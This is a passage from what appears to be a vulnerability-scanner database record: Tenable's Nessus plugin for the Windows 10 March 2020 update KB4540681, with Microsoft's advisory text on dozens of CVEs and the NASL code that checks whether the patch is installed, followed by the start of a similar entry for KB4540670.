An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0690)\n\n - An elevation of privilege vulnerability exists when the Windows AppX Deployment Server improperly handles file operations. (CVE-2020-0776)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0832, CVE-2020-0833)\n\n - A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0768, CVE-2020-0830)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when MSI packages process symbolic links. An attacker who successfully exploited this vulnerability could bypass access restrictions to add or remove files. (CVE-2020-0779)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) improperly handles symbolic links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-0787)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. 
An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0847)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges. An attacker with unprivileged access to a vulnerable system could exploit this vulnerability. The security update addresses the vulnerability by ensuring the Diagnostics Hub Standard Collector Service properly handles file operations. (CVE-2020-0793)\n\n - An information disclosure vulnerability exists when Windows Error Reporting improperly handles file operations. (CVE-2020-0775)\n\n - An elevation of privilege vulnerability exists when the Windows CSC Service improperly handles memory.\n (CVE-2020-0769, CVE-2020-0771)\n\n - An information disclosure vulnerability exists in Windows when the Windows Imaging Component fails to properly handle objects in memory. An attacker who succesfully exploited this vulnerability could obtain information to further compromise the user's system.\n There are multiple ways an attacker could exploit this vulnerability: (CVE-2020-0853)\n\n - An elevation of privilege vulnerability exists when the Windows Language Pack Installer improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Language Pack Installer handles file operations. (CVE-2020-0822)\n\n - An elevation of privilege vulnerability exists when the Windows ActiveX Installer Service improperly handles memory. 
(CVE-2020-0770, CVE-2020-0773, CVE-2020-0860)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting improperly handles memory.\n (CVE-2020-0772)\n\n - A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge (HTML-based). The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0811)\n\n - An information disclosure vulnerability exists when Chakra improperly discloses the contents of its memory, which could provide an attacker with information to further compromise the user\u2019s computer or data. (CVE-2020-0813)\n\n - A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0816)\n\n - A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. 
An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-08323, CVE-2020-0826, CVE-2020-0827, CVE-2020-0828, CVE-2020-0829, CVE-2020-0831, CVE-2020-0848)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-03-10T00:00:00", "type": "nessus", "title": "KB4540681: Windows 10 Version 1709 March 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0645", "CVE-2020-0684", "CVE-2020-0690", "CVE-2020-0762", "CVE-2020-0768", "CVE-2020-0769", "CVE-2020-0770", "CVE-2020-0771", "CVE-2020-0772", "CVE-2020-0773", "CVE-2020-0774", "CVE-2020-0775", "CVE-2020-0776", "CVE-2020-0777", "CVE-2020-0778", "CVE-2020-0779", "CVE-2020-0780", "CVE-2020-0781", "CVE-2020-0783", "CVE-2020-0785", "CVE-2020-0787", "CVE-2020-0788", "CVE-2020-0791", "CVE-2020-0793", "CVE-2020-0797", "CVE-2020-0798", "CVE-2020-0799", "CVE-2020-0800", "CVE-2020-0801", "CVE-2020-0802", "CVE-2020-0803", "CVE-2020-0804", "CVE-2020-0806", "CVE-2020-0808", "CVE-2020-0809", "CVE-2020-0810", "CVE-2020-0811", "CVE-2020-0813", "CVE-2020-0814", "CVE-2020-0816", "CVE-2020-0819", "CVE-2020-0820", "CVE-2020-0822", "CVE-2020-0823", "CVE-2020-0824", "CVE-2020-0826", "CVE-2020-0827", "CVE-2020-0828", "CVE-2020-0829", "CVE-2020-0830", "CVE-2020-0831", "CVE-2020-0832", "CVE-2020-08323", "CVE-2020-0833", "CVE-2020-0834", "CVE-2020-0840", "CVE-2020-0841", "CVE-2020-0842", "CVE-2020-0843", "CVE-2020-0844", "CVE-2020-0845", "CVE-2020-0847", "CVE-2020-0848", "CVE-2020-0849", "CVE-2020-0853", "CVE-2020-0857", "CVE-2020-0858", "CVE-2020-0859", "CVE-2020-0860", "CVE-2020-0861", "CVE-2020-0864", "CVE-2020-0865", 
"CVE-2020-0866", "CVE-2020-0867", "CVE-2020-0868", "CVE-2020-0869", "CVE-2020-0871", "CVE-2020-0877", "CVE-2020-0880", "CVE-2020-0881", "CVE-2020-0882", "CVE-2020-0883", "CVE-2020-0885", "CVE-2020-0887", "CVE-2020-0896", "CVE-2020-0897"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_MAR_4540681.NASL", "href": "https://www.tenable.com/plugins/nessus/134371", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134371);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2020-0645\",\n \"CVE-2020-0684\",\n \"CVE-2020-0690\",\n \"CVE-2020-0762\",\n \"CVE-2020-0768\",\n \"CVE-2020-0769\",\n \"CVE-2020-0770\",\n \"CVE-2020-0771\",\n \"CVE-2020-0772\",\n \"CVE-2020-0773\",\n \"CVE-2020-0774\",\n \"CVE-2020-0775\",\n \"CVE-2020-0776\",\n \"CVE-2020-0777\",\n \"CVE-2020-0778\",\n \"CVE-2020-0779\",\n \"CVE-2020-0780\",\n \"CVE-2020-0781\",\n \"CVE-2020-0783\",\n \"CVE-2020-0785\",\n \"CVE-2020-0787\",\n \"CVE-2020-0788\",\n \"CVE-2020-0791\",\n \"CVE-2020-0793\",\n \"CVE-2020-0797\",\n \"CVE-2020-0798\",\n \"CVE-2020-0799\",\n \"CVE-2020-0800\",\n \"CVE-2020-0801\",\n \"CVE-2020-0802\",\n \"CVE-2020-0803\",\n \"CVE-2020-0804\",\n \"CVE-2020-0806\",\n \"CVE-2020-0808\",\n \"CVE-2020-0809\",\n \"CVE-2020-0810\",\n \"CVE-2020-0811\",\n \"CVE-2020-0813\",\n \"CVE-2020-0814\",\n \"CVE-2020-0816\",\n \"CVE-2020-0819\",\n \"CVE-2020-0820\",\n \"CVE-2020-0822\",\n \"CVE-2020-0823\",\n \"CVE-2020-0824\",\n \"CVE-2020-0826\",\n \"CVE-2020-0827\",\n \"CVE-2020-0828\",\n \"CVE-2020-0829\",\n \"CVE-2020-0830\",\n \"CVE-2020-0831\",\n \"CVE-2020-0832\",\n \"CVE-2020-0833\",\n 
\"CVE-2020-0834\",\n \"CVE-2020-0840\",\n \"CVE-2020-0841\",\n \"CVE-2020-0842\",\n \"CVE-2020-0843\",\n \"CVE-2020-0844\",\n \"CVE-2020-0845\",\n \"CVE-2020-0847\",\n \"CVE-2020-0848\",\n \"CVE-2020-0849\",\n \"CVE-2020-0853\",\n \"CVE-2020-0857\",\n \"CVE-2020-0858\",\n \"CVE-2020-0859\",\n \"CVE-2020-0860\",\n \"CVE-2020-0861\",\n \"CVE-2020-0864\",\n \"CVE-2020-0865\",\n \"CVE-2020-0866\",\n \"CVE-2020-0867\",\n \"CVE-2020-0868\",\n \"CVE-2020-0869\",\n \"CVE-2020-0871\",\n \"CVE-2020-0877\",\n \"CVE-2020-0880\",\n \"CVE-2020-0881\",\n \"CVE-2020-0882\",\n \"CVE-2020-0883\",\n \"CVE-2020-0885\",\n \"CVE-2020-0887\",\n \"CVE-2020-0896\",\n \"CVE-2020-0897\"\n );\n script_xref(name:\"MSKB\", value:\"4540681\");\n script_xref(name:\"MSFT\", value:\"MS20-4540681\");\n script_xref(name:\"IAVA\", value:\"2020-A-0214-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"KB4540681: Windows 10 Version 1709 March 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4540681.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n Windows Device Setup Manager improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Device Setup Manager\n handles file operations. (CVE-2020-0819)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. 
An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-0777, CVE-2020-0797,\n CVE-2020-0800, CVE-2020-0864, CVE-2020-0865,\n CVE-2020-0866, CVE-2020-0897)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0824)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-0814,\n CVE-2020-0842, CVE-2020-0843)\n\n - An information vulnerability exists when Windows Modules\n Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow\n the attacker to read any file on the file system.\n (CVE-2020-0859)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-0791)\n\n - An information disclosure vulnerability exists when\n Windows Network Connections Service fails to properly\n handle objects in memory. An attacker who successfully\n exploited the vulnerability could potentially disclose\n memory contents of an elevated process. (CVE-2020-0871)\n\n - An elevation of privilege vulnerability exists when the\n "Public Account Pictures" folder improperly\n handles junctions. 
(CVE-2020-0858)\n\n - A tampering vulnerability exists when Microsoft IIS\n Server improperly handles malformed request headers. An\n attacker who successfully exploited the vulnerability\n could cause a vulnerable server to improperly process\n HTTP headers and tamper with the responses returned to\n clients. (CVE-2020-0645)\n\n - An elevation of privilege vulnerability exists in the\n way the Provisioning Runtime validates certain file\n operations. An attacker who successfully exploited the\n vulnerability could gain elevated privileges on a victim\n system. (CVE-2020-0808)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0788, CVE-2020-0877,\n CVE-2020-0887)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-0778, CVE-2020-0802,\n CVE-2020-0803, CVE-2020-0804, CVE-2020-0845)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. 
(CVE-2020-0798)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when the Windows kernel fails to\n properly handle parsing of certain symbolic links. An\n attacker who successfully exploited this vulnerability\n could potentially access privileged registry keys and\n thereby elevate permissions. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0799)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. The security\n update addresses the vulnerability by correcting how the\n Connected User Experiences and Telemetry Service handles\n file operations. (CVE-2020-0844)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector allows file creation in arbitrary\n locations. (CVE-2020-0810)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-0801,\n CVE-2020-0809, CVE-2020-0869)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. 
An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-0684)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles hard links. An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-0840, CVE-2020-0841, CVE-2020-0849,\n CVE-2020-0896)\n\n - An elevation of privilege vulnerability exists when the\n Windows User Profile Service (ProfSvc) improperly\n handles symlinks. An attacker who successfully exploited\n this vulnerability could delete files and folders in an\n elevated context. (CVE-2020-0785)\n\n - An elevation of privilege vulnerability exists when\n Windows Defender Security Center handles certain objects\n in memory. (CVE-2020-0762)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0857)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2020-0806)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the user's system. 
There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0774, CVE-2020-0880, CVE-2020-0882)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0881,\n CVE-2020-0883)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise a user's system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document\n or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how\n the Windows GDI component handles objects in memory.\n (CVE-2020-0885)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the user's system. An attacker who had already\n gained execution on the victim system could exploit this\n vulnerability by running a specially crafted\n application. The update addresses the vulnerability by\n correcting how Media Foundation handles objects in\n memory. 
(CVE-2020-0820)\n\n - An elevation of privilege vulnerability exists when the\n Windows Update Orchestrator Service improperly handles\n file operations. An attacker who successfully exploited\n this vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Update Orchestrator\n Service handles file operations. (CVE-2020-0867,\n CVE-2020-0868)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network List Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-0780)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to Advanced Local\n Procedure Call (ALPC). An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n the security context of the local system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0834)\n\n - An elevation of privilege vulnerability exists when the\n Windows Universal Plug and Play (UPnP) service\n improperly handles objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0781, CVE-2020-0783)\n\n - An information disclosure vulnerability exists when the\n Windows Network Driver Interface Specification (NDIS)\n improperly handles memory. (CVE-2020-0861)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. 
An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0690)\n\n - An elevation of privilege vulnerability exists when the\n Windows AppX Deployment Server improperly handles file\n operations. (CVE-2020-0776)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0832, CVE-2020-0833)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0768, CVE-2020-0830)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when MSI packages process symbolic\n links. An attacker who successfully exploited this\n vulnerability could bypass access restrictions to add or\n remove files. (CVE-2020-0779)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n improperly handles symbolic links. An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-0787)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. 
An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0847)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-0793)\n\n - An information disclosure vulnerability exists when\n Windows Error Reporting improperly handles file\n operations. (CVE-2020-0775)\n\n - An elevation of privilege vulnerability exists when the\n Windows CSC Service improperly handles memory.\n (CVE-2020-0769, CVE-2020-0771)\n\n - An information disclosure vulnerability exists in\n Windows when the Windows Imaging Component fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could obtain\n information to further compromise the user's system.\n There are multiple ways an attacker could exploit this\n vulnerability: (CVE-2020-0853)\n\n - An elevation of privilege vulnerability exists when the\n Windows Language Pack Installer improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Language Pack Installer\n handles file operations. (CVE-2020-0822)\n\n - An elevation of privilege vulnerability exists when the\n Windows ActiveX Installer Service improperly handles\n memory. 
(CVE-2020-0770, CVE-2020-0773, CVE-2020-0860)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles memory.\n (CVE-2020-0772)\n\n - A remote code execution vulnerability exists in the way \n that the Chakra scripting engine handles objects in \n memory in Microsoft Edge (HTML-based). The vulnerability\n could corrupt memory in such a way that an attacker could \n execute arbitrary code in the context of the current user. \n An attacker who successfully exploited the vulnerability \n could gain the same user rights as the current user. If \n the current user is logged on with administrative user \n rights, an attacker who successfully exploited the \n vulnerability could take control of an affected system. \n An attacker could then install programs; view, change, \n or delete data; or create new accounts with full user \n rights. (CVE-2020-0811)\n\n - An information disclosure vulnerability exists when \n Chakra improperly discloses the contents of its memory, \n which could provide an attacker with information to \n further compromise the user's computer or data. \n (CVE-2020-0813)\n\n - A remote code execution vulnerability exists when \n Microsoft Edge improperly accesses objects in memory. \n The vulnerability could corrupt memory in such a way \n that enables an attacker to execute arbitrary code in \n the context of the current user. An attacker who \n successfully exploited the vulnerability could gain \n the same user rights as the current user. If the current \n user is logged on with administrative user rights, an \n attacker could take control of an affected system. An \n attacker could then install programs; view, change, or \n delete data; or create new accounts with full user rights.\n (CVE-2020-0816)\n\n - A remote code execution vulnerability exists in the way \n that the ChakraCore scripting engine handles objects in \n memory. 
The vulnerability could corrupt memory in such a \n way that an attacker could execute arbitrary code in the \n context of the current user. An attacker who successfully \n exploited the vulnerability could gain the same user \n rights as the current user. If the current user is logged \n on with administrative user rights, an attacker who \n successfully exploited the vulnerability could take \n control of an affected system. An attacker could then \n install programs; view, change, or delete data; or create \n new accounts with full user rights. (CVE-2020-08323,\n CVE-2020-0826, CVE-2020-0827, CVE-2020-0828, CVE-2020-0829,\n CVE-2020-0831, CVE-2020-0848)\");\n # https://support.microsoft.com/en-us/help/4540681/windows-10-update-kb4540681\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2dc3112c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4540681.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0690\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Background Intelligent Transfer Service Arbitrary File Move Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/03/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/10\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-03\";\nkbs = make_list('4540681');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nmy_os_build = get_kb_item(\"SMB/WindowsVersionBuild\");\nproductname = get_kb_item_or_exit(\"SMB/ProductName\");\n\n# Build 16299 is only serviced for Enterprise, Education and Server SKUs; other editions are out of scope.\n# Equality test (==), not assignment: the original single '=' overwrote my_os_build instead of comparing it.\nif (my_os_build == \"16299\" && \"enterprise\" >!< tolower(productname) && \"education\" >!< tolower(productname) && \"server\" >!< tolower(productname))\n audit(AUDIT_OS_NOT, \"a supported version of Windows\");\n\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n 
os_build:\"16299\",\n rollup_date:\"03_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4540681])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T15:28:49", "description": "The remote Windows host is missing security update 4540670.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the Windows Device Setup Manager improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Device Setup Manager handles file operations. (CVE-2020-0819)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. (CVE-2020-0777, CVE-2020-0797, CVE-2020-0800, CVE-2020-0864, CVE-2020-0865, CVE-2020-0866, CVE-2020-0897)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. 
(CVE-2020-0824)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-0814, CVE-2020-0842, CVE-2020-0843)\n\n - An information disclosure vulnerability exists when Windows Modules Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow the attacker to read any file on the file system.\n (CVE-2020-0859)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) improperly handles symbolic links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-0787)\n\n - An information disclosure vulnerability exists when Windows Network Connections Service fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could potentially disclose memory contents of an elevated process. (CVE-2020-0871)\n\n - An elevation of privilege vulnerability exists when the \"Public Account Pictures\" folder improperly handles junctions. (CVE-2020-0858)\n\n - A tampering vulnerability exists when Microsoft IIS Server improperly handles malformed request headers. An attacker who successfully exploited the vulnerability could cause a vulnerable server to improperly process HTTP headers and tamper with the responses returned to clients. (CVE-2020-0645)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. 
